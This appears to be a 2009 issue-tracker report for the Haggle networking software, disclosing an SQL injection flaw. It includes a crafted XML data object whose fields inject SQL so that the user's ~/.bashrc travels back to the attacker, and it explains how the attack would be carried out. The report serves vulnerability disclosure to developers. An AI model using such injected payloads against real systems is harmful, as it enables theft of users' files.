The data object below demonstrates an SQL injection vulnerability currently
present in the code
that would allow an attacker to retrieve any file on disk that the user running
haggle can read.
<Haggle create_time="1244305072.492840">
<Attr name="Evil">Evil</Attr>
<Data>
<FilePath>'*/--','/cruel</FilePath>
<FileName>cruel</FileName>
<DataLen>0</DataLen>
</Data>
<Evil><A>'/*</A>
<Haggle>
<Evil>
<A>*/||'</A>
</Evil>
</Haggle >
<xtra>','~/.bashrc','bashrc',0,1244204689393,1244204690602,1205,-1);/*</xtra>
</Evil>
</Haggle>
Note that the data object above has a 0 file size specified, and only tries to
get at the user's
.bashrc file.
Also note that the xml header, when inserted into the data base, will not
indicate that the data
object is in any way bad, except for some strange indentation and that the file
path is outside
haggle's folder. This also means that if this data object were to be propagated
through the
network, it would simply carry with it the targeted file, it would not also
cause other users to
spread their files by the same name. The data object that would be spread would
look like this:
<Haggle create_time="1244305072.492840">
<Attr name="Evil">Evil</Attr>
<Data>
<FileName>cruel</FileName>
<DataLen>0</DataLen>
</Data>
<Evil>
<A></A>
</Evil>
</Haggle>
<xtra>
The attacker would go about it by inserting the data object above into a haggle
instance, and
simultaneously have an instance of haggle with an interest in the attribute in
the data object.
That would cause haggle to send the data object back to the attacker, and the
file would arrive
with it.
This is currently a minor threat, but it is an important issue.
Original issue reported on code.google.com by daniel.a...@it.uu.se on 31 Aug 2009 at 7:05
Original issue reported on code.google.com by
daniel.a...@it.uu.seon 31 Aug 2009 at 7:05